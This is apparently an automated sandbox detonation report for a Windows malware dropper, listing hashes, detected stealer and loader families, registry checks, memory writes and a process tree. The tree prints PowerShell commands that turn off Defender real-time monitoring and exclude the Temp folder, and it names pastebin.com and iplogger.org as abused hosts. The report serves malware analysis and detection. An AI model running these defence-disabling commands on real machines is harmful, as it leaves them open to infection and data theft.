memory/2744-285-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2744-284-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2744-292-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab6307.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:28

Platform

win10v2004-20241007-en

Max time kernel

91s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0988d1c2bd9a37.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed098e48a54663552b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0961d5d40c7b937c7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0937c2dc68a2496.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a48dab921a3bda7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-V5K5R.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0937c2dc68a2496.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0961d5d40c7b937c7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-V5K5R.tmp\Wed09a6fb1d0dd846.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed098e48a54663552b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a48dab921a3bda7.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5032 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 5032 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 5032 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3636 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe
PID 3636 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe
PID 3636 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe
PID 3516 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3684 wrote to memory of 4472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3684 wrote to memory of 4472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3684 wrote to memory of 4472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3528 wrote to memory of 1544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3528 wrote to memory of 1544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3528 wrote to memory of 1544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3516 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4528 wrote to memory of 3124 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0988d1c2bd9a37.exe
PID 4528 wrote to memory of 3124 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0988d1c2bd9a37.exe
PID 2404 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe
PID 2404 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe
PID 2404 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe
PID 1652 wrote to memory of 3780 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe
PID 1652 wrote to memory of 3780 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe
PID 1652 wrote to memory of 3780 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe
PID 316 wrote to memory of 744 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe
PID 316 wrote to memory of 744 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe

"C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09a48dab921a3bda7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09e3a07534aa.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed094d15aaa9a48.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed096e68af113.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed098e48a54663552b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09c36f786070b6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0911cd5800a45.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09a6fb1d0dd846.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0961d5d40c7b937c7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0937c2dc68a2496.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0988d1c2bd9a37.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0988d1c2bd9a37.exe

Wed0988d1c2bd9a37.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3516 -ip 3516

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe

Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe

Wed096e68af113.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe

Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe

Wed094d15aaa9a48.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe

Wed0911cd5800a45.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed098e48a54663552b.exe

